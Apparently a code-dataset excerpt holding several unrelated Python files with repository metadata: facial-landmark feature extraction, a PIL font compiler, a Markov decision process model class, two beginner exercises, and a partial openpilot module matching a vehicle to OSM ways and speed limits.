                offset_frames = range(offset_indexes[0], offset_indexes[1])
                onset_index = 0
                apex_index = 1
                offset_index = 2
                # fill "labels" list with the corresponding index for each frame
                labels = []
                for i in range(len(amplitudes)):
                    if i in onset_frames:
                        labels.append(onset_index)
                    elif i in offset_frames:
                        labels.append(offset_index)
                    else:
                        labels.append(apex_index)
                # bucket per-frame values by phase
                clusters = [[], [], []]
                xs = [[], [], []]
                cluster_left_amplitudes = [[], [], []]
                cluster_right_amplitudes = [[], [], []]
                for i, l in enumerate(labels):
                    clusters[l].append(amplitudes[i])
                    cluster_left_amplitudes[l].append(left_amplitudes[i])
                    cluster_right_amplitudes[l].append(right_amplitudes[i])
                    xs[l].append(i)
            else:
                # Method 2: cluster based (k-means over (frame, amplitude))
                labels = division_kmeans(amplitudes)
                onset_index = labels[0]
                offset_index = labels[-1]
                apex_index = 3 - (onset_index + offset_index)
                # get index of the first frame labelled as offset
                last_green = list(filter(lambda x: x[1] == offset_index, enumerate(labels)))[0]
                # fix incorrect offset-labelled points occurring before that frame
                labels = [ (labels[x[0]-1] if x[0] < last_green[0] and x[1] == offset_index else x[1]) for x in enumerate(labels) ]
                clusters = [[], [], []]
                xs = [[], [], []]
                cluster_left_amplitudes = [[], [], []]
                cluster_right_amplitudes = [[], [], []]
                for i, l in enumerate(labels):
                    clusters[l].append(amplitudes[i])
                    cluster_left_amplitudes[l].append(left_amplitudes[i])
                    cluster_right_amplitudes[l].append(right_amplitudes[i])
                    xs[l].append(i)
        except Exception as e:
            if tries > 0:
                raise Exception('It is the second time that something went wrong with ' + input_folder)
            print('There was an error here' + input_folder)
            print(e)
            # try with a different division algorithm
            algorithm_to_use = 'cluster' if algorithm_to_use == 'paper' else 'paper'
            tries += 1
            continue
        # Here we have the division in phases.
        # Now it's time to run the feature extraction.
        # NOTE: this step can also raise (e.g. if a phase ended up empty);
        # in that case the other division algorithm is tried once.
        try:
            amplitudes_onset, speed_onset = segmentize(xs[onset_index], clusters[onset_index])
            amplitudes_apex, speed_apex = segmentize(xs[apex_index], clusters[apex_index])
            amplitudes_offset, speed_offset = segmentize(xs[offset_index], clusters[offset_index])
            left_amplitude_onset, _ = segmentize(xs[onset_index], cluster_left_amplitudes[onset_index])
            right_amplitude_onset, _ = segmentize(xs[onset_index], cluster_right_amplitudes[onset_index])
            left_amplitude_apex, _ = segmentize(xs[apex_index], cluster_left_amplitudes[apex_index])
            right_amplitude_apex, _ = segmentize(xs[apex_index], cluster_right_amplitudes[apex_index])
            left_amplitude_offset, _ = segmentize(xs[offset_index], cluster_left_amplitudes[offset_index])
            right_amplitude_offset, _ = segmentize(xs[offset_index], cluster_right_amplitudes[offset_index])
            onsetFeatures = extractFeatures(amplitudes_onset, speed_onset, left_amplitude_onset, right_amplitude_onset)
            apexFeatures = extractFeatures(amplitudes_apex, speed_apex, left_amplitude_apex, right_amplitude_apex)
            offsetFeatures = extractFeatures(amplitudes_offset, speed_offset, left_amplitude_offset, right_amplitude_offset)
            totalFeaturesSet = onsetFeatures + apexFeatures + offsetFeatures
            # writeCSV(totalFeaturesSet, 'lip_total', input_folder)
            return labels, totalFeaturesSet
        except Exception as e:
            if tries > 0:
                raise Exception('It is the second time that something went wrong with ' + input_folder)
            print('There was an error here' + input_folder)
            print(e)
            # try with a different division algorithm
            algorithm_to_use = 'cluster' if algorithm_to_use == 'paper' else 'paper'
            tries += 1
def extractEyeLidFeaturesFromFolder(input_folder, labels):
    """
    Extract the 25 eyelid features per temporal phase (75 total) from the
    landmark files in `input_folder`.

    `labels` is the per-frame phase assignment computed by
    extractDlipFeaturesFromFolder, so both signals share the same
    onset/apex/offset division.
    """
    # get the list of all the landmarks files
    search_model = input_folder + "*.lm"
    file_list = glob.glob(search_model)
    # sort file_list in natural order
    file_list.sort(key=natural_keys)
    # for each file in the list, extract l1..l6 (eye landmarks),
    # calculate the eyelid amplitude and save it in "amplitudes"
    amplitudes = []
    left_amplitudes = []
    right_amplitudes = []
    for f in file_list:
        landmarks = extractPoints(f)
        l1 = landmarks[1]
        l2 = landmarks[2]
        l3 = landmarks[3]
        l4 = landmarks[4]
        l5 = landmarks[5]
        l6 = landmarks[6]
        # Calculate deyelid, normalized by twice the eye width
        left_amplitude = eyeLidAmplitude(l1, l3, l2)
        right_amplitude = eyeLidAmplitude(l4, l6, l5)
        dyeyelid = (left_amplitude + right_amplitude) / (2*distance(l1, l3))
        amplitudes.append(dyeyelid)
        left_amplitudes.append(left_amplitude)
        right_amplitudes.append(right_amplitude)
    # We already have "labels" defining each frame's phase; bucket by phase.
    clusters = [[], [], []]
    xs = [[], [], []]
    cluster_left_amplitudes = [[], [], []]
    cluster_right_amplitudes = [[], [], []]
    for i, l in enumerate(labels):
        clusters[l].append(amplitudes[i])
        cluster_left_amplitudes[l].append(left_amplitudes[i])
        cluster_right_amplitudes[l].append(right_amplitudes[i])
        xs[l].append(i)
    # still a valid way to compute the indexes for both
    # longest-sequence and k-means divisions
    onset_index = labels[0]
    offset_index = labels[-1]
    apex_index = 3 - (onset_index + offset_index)
    # NOTE(review): unlike the lip path, this block is not wrapped in a
    # retry — an empty phase here propagates the exception to the caller.
    amplitudes_onset, speed_onset = segmentize(xs[onset_index], clusters[onset_index])
    amplitudes_apex, speed_apex = segmentize(xs[apex_index], clusters[apex_index])
    amplitudes_offset, speed_offset = segmentize(xs[offset_index], clusters[offset_index])
    left_amplitude_onset, _ = segmentize(xs[onset_index], cluster_left_amplitudes[onset_index])
    right_amplitude_onset, _ = segmentize(xs[onset_index], cluster_right_amplitudes[onset_index])
    left_amplitude_apex, _ = segmentize(xs[apex_index], cluster_left_amplitudes[apex_index])
    right_amplitude_apex, _ = segmentize(xs[apex_index], cluster_right_amplitudes[apex_index])
    left_amplitude_offset, _ = segmentize(xs[offset_index], cluster_left_amplitudes[offset_index])
    right_amplitude_offset, _ = segmentize(xs[offset_index], cluster_right_amplitudes[offset_index])
    onsetFeatures = extractFeatures(amplitudes_onset, speed_onset, left_amplitude_onset, right_amplitude_onset)
    apexFeatures = extractFeatures(amplitudes_apex, speed_apex, left_amplitude_apex, right_amplitude_apex)
    offsetFeatures = extractFeatures(amplitudes_offset, speed_offset, left_amplitude_offset, right_amplitude_offset)
    totalFeaturesSet = onsetFeatures + apexFeatures + offsetFeatures
    # writeCSV(totalFeaturesSet, 'eye_total', input_folder)
    return totalFeaturesSet
# ---- CLI entry point ----
# Usage: features_extraction.py <input_folder> <fps> <gender> <age>
if len(sys.argv) != 5:
    print('Wrong syntax: use these params.')
    print('- input_folder: folder that contains .lm files')
    print('- fps: video frame rate of the original video')
    print('- gender: (0=male, 1=female)')
    print('- age: (es. 42)')
    sys.exit()
# Get command line args
input_folder = sys.argv[1]  # sys.argv[1] is the folder that contains .lm files
fps = int(sys.argv[2])  # module-level global: read by segmentize/extractFeatures
gender = int(sys.argv[3])
age = int(sys.argv[4])
# Extract Dlip.
# `labels` contains the temporal division in onset, offset, and apex;
# the same temporal division is then used in eyelid features extraction.
labels, dlip_features = extractDlipFeaturesFromFolder(input_folder)
# Extract DEyeLid
dyeyelid_features = extractEyeLidFeaturesFromFolder(input_folder, labels)
# Aggregate: [gender, age] + 75 lip features + 75 eyelid features
total_features = [gender, age] + dlip_features + dyeyelid_features
# Write on CSV
writeCSV(total_features, 'total', input_folder)
| [
"emavgl@gmail.com"
] | emavgl@gmail.com |
467737aa13e6224c2b5459fae510519622e05c84 | b4c11d69197ef90dcacc8e34884036e4f576855e | /Python/myEnvironment/djangoEnv/bin/pilfont.py | 146697b69ee3a1e8db89379b57baf96f2fd4437e | [] | no_license | VT-Zhang/PYTHON_Platform_Works | c6314715e207995cce0244c38c8d48f95cf934b8 | 52654ef0ecf9102bfe378540818ebbb2dc27a134 | refs/heads/master | 2021-06-15T02:22:03.868898 | 2017-03-07T16:20:26 | 2017-03-07T16:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | #!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"

# No font files given: print usage and exit with an error code.
if len(sys.argv) <= 1:
    print("PILFONT", VERSION, "-- PIL font compiler.")
    print()
    print("Usage: pilfont fontfiles...")
    print()
    print("Convert given font files to the PIL raster font format.")
    print("This version of pilfont supports X BDF and PCF fonts.")
    sys.exit(1)

# Expand shell-style wildcards in each argument into a flat file list.
files = []
for f in sys.argv[1:]:
    files = files + glob.glob(f)

# Compile each font: try PCF first, fall back to BDF when the PCF
# header does not parse; report per-file success/failure.
for f in files:
    print(f + "...", end=' ')
    try:
        fp = open(f, "rb")
        try:
            p = PcfFontFile.PcfFontFile(fp)
        except SyntaxError:
            # Not a PCF file: rewind and retry as BDF.
            fp.seek(0)
            p = BdfFontFile.BdfFontFile(fp)
        p.save(f)
    except (SyntaxError, IOError):
        print("failed")
    else:
        print("OK")
| [
"jianz@vt.edu"
] | jianz@vt.edu |
514614844345f08437ac5400067ba42873c89217 | eb1a126f069d764614d57f2dd5ec8b0ae11cba20 | /mdp_environment/utils/mdp_core.py | 56f1126d8d76f45fdd1f536fd0a4449512e68da7 | [
"MIT"
] | permissive | Rishav1/mdp_environment | a1a1584977c40b8959a9d96ffad9b0a25c7641c3 | be8b046970586bc9ab25cfb5b428759700ef4480 | refs/heads/master | 2021-05-10T11:03:24.981169 | 2019-03-02T14:30:16 | 2019-03-02T14:30:16 | 118,399,999 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,778 | py | import numpy as np
from mdp_environment.utils.exceptions import *
from mdp_environment.utils.state import State
import warnings
import networkx as nx
import copy
class MDPModel:
    """A Markov Decision Process model.

    Holds states, actions and per-(state, action) transition distributions,
    supports sampling episodes (`initialize`/`transition`) and renders the
    process as a graph via networkx/pydot (`visualize`).
    """

    def __init__(self, name, states=None, actions=None, transitions=None, init_states=None, final_states=None):
        """Create a model named `name`.

        Container arguments may be supplied up front; omitted ones default to
        empty dicts. (Fix: previously a non-None argument was silently ignored
        and the corresponding attribute was left unset.)
        """
        self.name = name
        self.states = {} if states is None else states
        self.actions = {} if actions is None else actions
        self.transitions = {} if transitions is None else transitions
        self.init_states = {} if init_states is None else init_states
        self.final_states = {} if final_states is None else final_states
        self.finalized = False      # True once the model is frozen for use
        self.step = 0               # steps taken in the current episode
        self.final_step = -1        # step limit per episode; -1 means unlimited
        self.initialized = False    # True while an episode is in progress
        self.terminated = True
        self.prev_state = None
        self.current_state = None
        self.visual_graph = nx.MultiDiGraph()

    def add_states(self, input_states):
        """Register new states. Raises if the model is finalized or on duplicate ids."""
        if self.finalized:
            raise MDPModelFinalized
        for state in input_states:
            if state.id in self.states.keys():
                raise StateAlreadyPresent({state.id: self.states[state.id].name})
            self.states[state.id] = state
            self.visual_graph.add_node(state.id, label=state.name)
        return self

    def get_states(self, state_ids):
        """Yield the state(s) for a single id or a list of ids.

        Raises StateNotPresent for unknown ids.
        """
        if type(state_ids) != list:
            if state_ids not in self.states.keys():
                raise StateNotPresent(state_ids)
            else:
                yield self.states[state_ids]
            # Fix: a single (non-list) id was handled; previously execution fell
            # through to the loop below and raised TypeError on non-iterable ids.
            return
        for state_id in state_ids:
            if state_id not in self.states.keys():
                raise StateNotPresent(state_id)
            else:
                yield self.states[state_id]

    def add_actions(self, input_actions):
        """Register new actions. Raises if the model is finalized or on duplicate ids."""
        if self.finalized:
            raise MDPModelFinalized
        for action in input_actions:
            if action.id in self.actions.keys():
                raise ActionAlreadyPresent({action.id: self.actions[action.id].name})
            self.actions[action.id] = action
        return self

    def get_actions(self, action_ids):
        """Yield the action(s) for a single id or a list of ids.

        Raises ActionNotPresent for unknown ids.
        """
        if type(action_ids) != list:
            if action_ids not in self.actions.keys():
                raise ActionNotPresent(action_ids)
            else:
                yield self.actions[action_ids]
            # Fix: same fall-through bug as get_states (see above).
            return
        for action_id in action_ids:
            if action_id not in self.actions.keys():
                raise ActionNotPresent(action_id)
            else:
                yield self.actions[action_id]

    def add_transition(self, state, action, p_transistion):
        """Set P(next | state, action).

        `p_transistion` maps next State -> probability and must sum to 1.
        Overwriting an existing (state, action) entry emits a warning.
        """
        if self.finalized:
            raise MDPModelFinalized
        if state.id not in self.states:
            raise StateNotPresent(state.id)
        if action.id not in self.actions:
            raise ActionNotPresent(action.id)
        for tstate in p_transistion.keys():
            if tstate.id not in self.states:
                raise StateNotPresent(tstate.id)
        try:
            np.testing.assert_almost_equal(np.sum(list(p_transistion.values())), 1.0)
        except AssertionError:
            raise ProbabilityError(p_transistion.values())
        if state.id in self.transitions:
            if action.id in self.transitions[state.id]:
                warnings.warn("Changing transition probability at {0}.".format((state.id, action.id)))
        if state.id in self.transitions.keys():
            self.transitions[state.id][action.id] = p_transistion
        else:
            self.transitions[state.id] = {action.id: p_transistion}
        for tstate, prob in p_transistion.items():
            # NOTE(review): `prob` used to be passed to format() but the template
            # only has one placeholder, so it was ignored; the label may have been
            # meant to include the probability — confirm intended label format.
            self.visual_graph.add_edge(state.id, tstate.id, weight=prob,
                                       label="{0}".format(action.name))
        return self

    def add_init_states(self, init_states):
        """Set the initial-state distribution: dict State -> probability (sums to 1)."""
        if self.finalized:
            raise MDPModelFinalized
        for state in init_states.keys():
            if state.id not in self.states:
                raise StateNotPresent(state.id)
        try:
            np.testing.assert_almost_equal(np.sum(list(init_states.values())), 1.0)
        except AssertionError:
            raise ProbabilityError(init_states.values())
        self.init_states = init_states
        # Mark initial states green in the rendered graph.
        for state in init_states.keys():
            attributes = self.visual_graph.node[state.id]
            attributes['fillcolor'] = 'green'
            attributes['style'] = 'filled'
        return self

    def add_final_states(self, final_states, final_step=-1):
        """Register terminal states (iterable of State) and an optional step limit."""
        if self.finalized:
            raise MDPModelFinalized
        for state in final_states:
            if state.id not in self.states:
                raise StateNotPresent(state.id)
            self.final_states[state.id] = state
            # Mark final states as red double circles in the rendered graph.
            attributes = self.visual_graph.node[state.id]
            attributes['fillcolor'] = 'red'
            attributes['style'] = 'filled'
            attributes['shape'] = 'doublecircle'
        self.final_step = final_step
        return self

    def finalize(self):
        """Freeze the model for use; requires at least one initial state."""
        if not self.init_states:
            raise InitStateNotSet
        self.finalized = True

    def initialize(self):
        """Sample a start state from the initial distribution and begin an episode."""
        if not self.finalized:
            raise MDPModelNotFinalized
        sample = np.random.multinomial(1, list(self.init_states.values()), size=1)
        index = np.where(sample[0] == 1)[0][0]
        self.prev_state = None
        self.current_state = list(self.init_states.keys())[index]
        self.initialized = True
        self.terminated = False
        return self.current_state

    def transition(self, action):
        """Sample and move to the next state given `action`.

        The episode terminates when the new state has no outgoing transitions,
        is a final state, or the step limit is reached.
        """
        if not self.initialized:
            raise MDPModelNotInitialized
        if self.current_state.id not in self.transitions:
            raise InvalidAction((self.current_state, action))
        if action.id not in self.transitions[self.current_state.id]:
            raise InvalidAction((self.current_state, action))
        sample = np.random.multinomial(
            1,
            list(self.transitions[self.current_state.id][action.id].values()),
            1
        )
        index = np.where(sample[0] == 1)[0][0]
        self.prev_state = self.current_state
        self.current_state = list(self.transitions[self.current_state.id][action.id].keys())[index]
        self.step += 1
        if (self.current_state.id not in self.transitions) or (self.current_state.id in self.final_states) or (
                self.step == self.final_step):
            self.terminated = True
            self.initialized = False
            self.step = 0
        return self.current_state

    def is_terminated(self):
        """Return True when no episode is in progress."""
        return self.terminated

    def visualize(self, highlight_state: State = None, highlight_next_state: State = None, file=""):
        """Render the MDP as a PNG, optionally highlighting a transition.

        Defaults to highlighting the last transition taken. When `file` is
        given the PNG is also written to disk; the PNG bytes are returned.

        NOTE(review): uses `graph.node[...]`, removed in networkx >= 2.4 —
        confirm the pinned networkx version.
        """
        if not self.finalized:
            raise MDPModelNotFinalized
        # Work on a copy so highlighting does not pollute the base graph.
        visual_graph = copy.deepcopy(self.visual_graph)
        if not highlight_state and not highlight_next_state:
            highlight_state = self.prev_state
            highlight_next_state = self.current_state
        if highlight_state:
            attributes = visual_graph.node[highlight_state.id]
            attributes['fillcolor'] = 'yellow'
            attributes['style'] = 'filled'
        if highlight_next_state:
            attributes = visual_graph.node[highlight_next_state.id]
            attributes['fillcolor'] = 'blue'
            attributes['style'] = 'filled'
        if highlight_state and highlight_next_state:
            attributes = visual_graph.edges[(highlight_state.id, highlight_next_state.id, 0)]
            attributes['fillcolor'] = 'purple'
            attributes['style'] = 'bold'
        if file:
            nx.nx_pydot.to_pydot(visual_graph).write_png(file)
        return nx.nx_pydot.to_pydot(visual_graph).create_png()
| [
"rishav.chourasia@gmail.com"
] | rishav.chourasia@gmail.com |
dcebc6b36fed20d92041c019092864c956b743da | e6ebd1f9e3968f6ed613e9f35e46716115e6e9c3 | /chapter3/demo1.py | fdb50467279d444e9033ffd2743c6fed6e6e300c | [] | no_license | huwanping001/Python | 897046d3d6d1b420befeefcaa2b9544efa7d1881 | 3c76278f7a9b216b28b8880e0108af3c550b9372 | refs/heads/main | 2023-08-21T00:45:17.991833 | 2021-10-18T13:47:52 | 2021-10-18T13:47:52 | 409,586,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | # 学校:四川轻化工大学
# College: 自信学院 (likely School of Automation & Information Engineering)
# Student: Hu Wanping (胡万平)
# Created: 2021/9/17 19:36
present= input('小胡想要什么礼物呢?')  # prompt (Chinese): "What gift does Xiao Hu want?"; input() always returns str
print(present,type(present))
| [
"noreply@github.com"
] | huwanping001.noreply@github.com |
551665072a6d342be82c0a95fc61d48fcd7a93c6 | be7bcd59ebfb39545b573b7c99dadaad936e0654 | /Lession7/confirmed_user.py | 6892a28b0ef62d88de353c90e4a11a1c7c900fc8 | [] | no_license | Dun9-dev/MyFirstProjects | d646dd0fc614393a99dcfd8221aaff476903af83 | dfbf5ef001ce5955d53c58eff16bdf91a003b1d3 | refs/heads/main | 2023-07-30T19:41:42.153783 | 2021-09-17T10:11:53 | 2021-09-17T10:11:53 | 395,537,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | unconfirmed_user = ['alice', 'brian', 'candace']
confirmed_user = []
while unconfirmed_user:
current_user = unconfirmed_user.pop()
print(f"Verifying user: {current_user.title()}")
confirmed_user.append(current_user)
print("\nThe following users have been confirmed:")
for confirmed_user in confirmed_user:
print(confirmed_user.title())
| [
"danilshestov35@gmail.com"
] | danilshestov35@gmail.com |
8518f5981c183fe9830b8730ea978e51cd789e27 | a2c5bc6c8d7401d94703a2575703ce64bc90a44d | /selfdrive/mapd/lib/WayRelation.py | 7c796eb403ee993a21a282c0a96a60997c7f2a15 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | rajnmaker/openpilot | 68e149bab1ae5a9d12293196ac093c217697273b | 32da3d10c7d689e3fba33b6ebbd24aed011ece2b | refs/heads/release3 | 2023-03-17T23:33:48.610082 | 2022-08-14T23:01:54 | 2022-08-14T23:03:47 | 215,939,315 | 0 | 0 | MIT | 2019-10-18T04:11:36 | 2019-10-18T04:11:33 | null | UTF-8 | Python | false | false | 15,615 | py | from selfdrive.mapd.lib.geo import DIRECTION, R, vectors, bearing_to_points, distance_to_points
from selfdrive.mapd.lib.osm import create_way
from common.conversions import Conversions as CV
from selfdrive.mapd.config import LANE_WIDTH
from common.basedir import BASEDIR
from datetime import datetime as dt
import numpy as np
import re
import json
_WAY_BBOX_PADING = 80. / R  # 80 mts of padding for the bounding box. (expressed in radians)

# Implicit country/road-class speed limits, loaded once at import time.
with open(BASEDIR + "/selfdrive/mapd/lib/default_speeds.json", "rb") as f:
    _COUNTRY_LIMITS = json.loads(f.read())

# Weekday abbreviations (as used in OSM conditional restrictions)
# mapped to datetime.weekday() indices (Monday == 0).
_WD = {
    'Mo': 0,
    'Tu': 1,
    'We': 2,
    'Th': 3,
    'Fr': 4,
    'Sa': 5,
    'Su': 6
}

# Relative priority of OSM highway types; lower rank = more important road.
_HIGHWAY_RANK = {
    'motorway': 0,
    'motorway_link': 1,
    'trunk': 10,
    'trunk_link': 11,
    'primary': 20,
    'primary_link': 21,
    'secondary': 30,
    'secondary_link': 31,
    'tertiary': 40,
    'tertiary_link': 41,
    'unclassified': 50,
    'residential': 60,
    'living_street': 61
}
def is_osm_time_condition_active(condition_string):
    """Tell whether a conditional-restriction time specification, as described
    at https://wiki.openstreetmap.org/wiki/Conditional_restrictions, applies
    to the current local date and time.
    """
    now = dt.now().astimezone()
    today = now.date()
    # Collect any weekday tokens present in the condition string.
    day_tokens = re.findall(r'(Mo|Tu|We|Th|Fr|Sa|Su[-,\s]*?)', condition_string)
    if len(day_tokens) == 1:
        active_days = [_WD[day_tokens[0]]]
    elif len(day_tokens) > 1:
        # Two or more tokens are treated as a range between the first two.
        active_days = list(range(_WD[day_tokens[0]], _WD[day_tokens[1]] + 1))
    else:
        active_days = []
    # A non-empty day list that excludes today means the condition is inactive.
    if active_days and now.weekday() not in active_days:
        return False
    # Collect "HH:MM-HH:MM" ranges; none means the whole day applies.
    time_ranges = re.findall(r'([0-9]{1,2}:[0-9]{2})\s*?-\s*?([0-9]{1,2}:[0-9]{2})', condition_string)
    if not time_ranges:
        # Active all day if weekday tokens were present, inactive otherwise.
        return len(day_tokens) > 0
    # Active if the current time falls inside any of the listed ranges.
    for start_str, end_str in time_ranges:
        start, end = (
            dt.combine(today, dt.strptime(t, '%H:%M').time().replace(tzinfo=now.tzinfo))
            for t in (start_str, end_str)
        )
        if start <= now <= end:
            return True
    return False
def speed_limit_value_for_limit_string(limit_string):
    """Parse a plain numeric speed limit string.

    Values are km/h by default, mph when explicitly noted. Returns the speed
    in m/s, or None when the string is not a plain numeric limit.
    """
    match = re.match(r'^\s*([0-9]{1,3})\s*?(mph)?\s*$', limit_string)
    if match is None:
        return None
    if match[2] == "mph":
        factor = CV.MPH_TO_MS
    else:
        factor = CV.KPH_TO_MS
    return factor * float(match[1])
def speed_limit_for_osm_tag_limit_string(limit_string):
    """Resolve an OSM ``maxspeed`` tag value to a speed in m/s.

    See https://wiki.openstreetmap.org/wiki/Key:maxspeed. Returns 0. when no
    limit can be derived (0. is treated as "no limit present").
    """
    if limit_string is None:
        return 0.
    # First attempt: a plain numeric value with optional units.
    parsed = speed_limit_value_for_limit_string(limit_string)
    if parsed is not None:
        return parsed
    # Second attempt: a country implicit value, e.g. "DE:urban" or "AT:zone:30".
    match = re.match(r'^\s*([A-Z]{2}):([a-z_]+):?([0-9]{1,3})?(\s+)?(mph)?\s*', limit_string)
    if match is None:
        return 0.
    limit = None
    if match[2] == "zone" and match[3] is not None:
        # Zone limits carry their own numeric value (mph when noted).
        factor = CV.MPH_TO_MS if match[5] == "mph" else CV.KPH_TO_MS
        limit = factor * float(match[3])
    elif f'{match[1]}:{match[2]}' in _COUNTRY_LIMITS:
        # Look up the country's default for this road class.
        limit = speed_limit_value_for_limit_string(_COUNTRY_LIMITS[f'{match[1]}:{match[2]}'])
    return limit if limit is not None else 0.
def conditional_speed_limit_for_osm_tag_limit_string(limit_string):
    """Resolve a ``maxspeed:conditional`` tag value.

    Returns the limit in m/s when one of its date-time conditions is currently
    active, 0. otherwise (0. is treated as "no limit present").
    """
    if limit_string is None:
        return 0.
    # Expected format: "<restriction-value> @ (<condition>)".
    match = re.match(r'^(.*)@\s*\((.*)\).*$', limit_string)
    if match is None:
        return 0.
    value = speed_limit_for_osm_tag_limit_string(match[1])
    if value == 0.:
        return 0.
    # Conditions may be chained with semicolons; any active one applies.
    for condition in re.findall(r'(?:;|^)([^;]*)', match[2]):
        if is_osm_time_condition_active(condition):
            return value
    # No currently active date-time condition.
    return 0.
class WayRelation():
    """A class that represent the relationship of an OSM way and a given `location` and `bearing` of a driving vehicle.
    """

    def __init__(self, way, parent=None):
        """Precompute per-node geometry (distances, bearings, bounding box) for `way`."""
        self.way = way
        self.parent = parent
        self.parent_wr_id = parent.id if parent is not None else None  # For WRs created as splits of other WRs
        self.reset_location_variables()
        self.direction = DIRECTION.NONE
        self._speed_limit = None  # cached, invalidated when direction changes
        self._one_way = way.tags.get("oneway")
        self.name = way.tags.get('name')
        self.ref = way.tags.get('ref')
        self.highway_type = way.tags.get("highway")
        self.highway_rank = _HIGHWAY_RANK.get(self.highway_type, 1000)
        # Missing or non-numeric 'lanes' tag defaults to 2.
        try:
            self.lanes = int(way.tags.get('lanes'))
        except Exception:
            self.lanes = 2
        # Create numpy arrays with nodes data to support calculations.
        self._nodes_np = np.radians(np.array([[nd.lat, nd.lon] for nd in way.nodes], dtype=float))
        self._nodes_ids = np.array([nd.id for nd in way.nodes], dtype=int)
        # Get the vectors representation of the segments between consecutive nodes. (N-1, 2)
        v = vectors(self._nodes_np) * R
        # Calculate the vector magnitudes (or distance) between nodes. (N-1)
        self._way_distances = np.linalg.norm(v, axis=1)
        # Calculate the bearing (from true north clockwise) for every section of the way (vectors between nodes). (N-1)
        self._way_bearings = np.arctan2(v[:, 0], v[:, 1])
        # Define bounding box to ease the process of locating a node in a way.
        # [[min_lat, min_lon], [max_lat, max_lon]]
        self.bbox = np.row_stack((np.amin(self._nodes_np, 0) - _WAY_BBOX_PADING,
                                  np.amax(self._nodes_np, 0) + _WAY_BBOX_PADING))
        # Get the edge nodes ids.
        self.edge_nodes_ids = [way.nodes[0].id, way.nodes[-1].id]

    def __repr__(self):
        return f'(id: {self.id}, between {self.behind_idx} and {self.ahead_idx}, {self.direction}, active: {self.active})'

    def __eq__(self, other):
        # NOTE(review): __eq__ without __hash__ makes instances unhashable —
        # confirm WayRelation objects are never used in sets/dict keys.
        if isinstance(other, WayRelation):
            return self.id == other.id
        return False

    def reset_location_variables(self):
        """Clear all state derived from a previous location/bearing update."""
        self.distance_to_node_ahead = 0.
        self.location_rad = None
        self.bearing_rad = None
        self.active = False
        self.diverting = False
        self.ahead_idx = None
        self.behind_idx = None
        self._active_bearing_delta = None
        self._distance_to_way = None

    @property
    def id(self):
        # Delegate to the underlying OSM way id.
        return self.way.id

    @property
    def road_name(self):
        # Prefer the human-readable name; fall back to the route reference.
        if self.name is not None:
            return self.name
        return self.ref

    def update(self, location_rad, bearing_rad, location_stdev):
        """Will update and validate the associated way with a given `location_rad` and `bearing_rad`.
        Specifically it will find the nodes behind and ahead of the current location and bearing.
        If no proper fit to the way geometry, the way relation is marked as invalid.
        """
        self.reset_location_variables()
        # Ignore if location not in way bounding box
        if not self.is_location_in_bbox(location_rad):
            return
        # - Get the distance and bearings from location to all nodes. (N)
        bearings = bearing_to_points(location_rad, self._nodes_np)
        distances = distance_to_points(location_rad, self._nodes_np)
        # - Get absolute bearing delta to current driving bearing. (N)
        delta = np.abs(bearing_rad - bearings)
        # - Nodes are ahead if the cosine of the delta is positive (N)
        is_ahead = np.cos(delta) >= 0.
        # - Possible locations on the way are those where adjacent nodes change from ahead to behind or viceversa.
        possible_idxs = np.nonzero(np.diff(is_ahead))[0]
        # - when no possible locations found, then the location is not in this way.
        if len(possible_idxs) == 0:
            return
        # - Find then angle formed between the vectors from the current location to consecutive nodes. This is the
        # value of the difference in the bearings of the vectors.
        teta = np.diff(bearings)
        # - When two consecutive nodes will be ahead and behind, they will form a triangle with the current location.
        # We find the closest distance to the way by solving the area of the triangle and finding the height (h).
        # We must use the abolute value of the sin of the angle in the formula, which is equivalent to ensure we
        # are considering the smallest of the two angles formed between the two vectors.
        # https://www.mathsisfun.com/algebra/trig-area-triangle-without-right-angle.html
        h = distances[:-1] * distances[1:] * np.abs(np.sin(teta)) / self._way_distances
        # - Calculate the delta between driving bearing and way bearings. (N-1)
        bw_delta = self._way_bearings - bearing_rad
        # - The absolut value of the sin of `bw_delta` indicates how close the bearings match independent of direction.
        # We will use this value along the distance to the way to aid on way selection. (N-1)
        abs_sin_bw_delta = np.abs(np.sin(bw_delta))
        # - Get the delta to way bearing indicators and the distance to the way for the possible locations.
        abs_sin_bw_delta_possible = abs_sin_bw_delta[possible_idxs]
        h_possible = h[possible_idxs]
        # - Get the index where the distance to the way is minimum. That is the chosen location.
        min_h_possible_idx = np.argmin(h_possible)
        min_delta_idx = possible_idxs[min_h_possible_idx]
        # - If the distance to the way is over 4 standard deviations of the gps accuracy + half the maximum road width
        # estimate, then we are way too far to stick to this way (i.e. we are not on this way anymore)
        half_road_width_estimate = self.lanes * LANE_WIDTH / 2.
        if h_possible[min_h_possible_idx] > 4. * location_stdev + half_road_width_estimate:
            return
        # - If the distance to the road is greater than 2 standard deviations of the gps accuracy + half the maximum road
        # width estimate then we are most likely diverting from this route.
        diverting = h_possible[min_h_possible_idx] > 2. * location_stdev + half_road_width_estimate
        # Populate location variables with result
        if is_ahead[min_delta_idx]:
            self.direction = DIRECTION.BACKWARD
            self.ahead_idx = min_delta_idx
            self.behind_idx = min_delta_idx + 1
        else:
            self.direction = DIRECTION.FORWARD
            self.ahead_idx = min_delta_idx + 1
            self.behind_idx = min_delta_idx
        self._distance_to_way = h[min_delta_idx]
        self._active_bearing_delta = abs_sin_bw_delta_possible[min_h_possible_idx]
        # TODO: The distance to node ahead currently represent the distance from the GPS fix location.
        # It would be perhaps more accurate to use the distance on the projection over the direct line between
        # the two nodes.
        self.distance_to_node_ahead = distances[self.ahead_idx]
        self.active = True
        self.diverting = diverting
        self.location_rad = location_rad
        self.bearing_rad = bearing_rad
        self._speed_limit = None  # invalidate cached limit; direction may have changed

    def update_direction_from_starting_node(self, start_node_id):
        """Set travel direction assuming the route enters this way at `start_node_id`."""
        self._speed_limit = None  # direction-dependent cache must be invalidated
        if self.edge_nodes_ids[0] == start_node_id:
            self.direction = DIRECTION.FORWARD
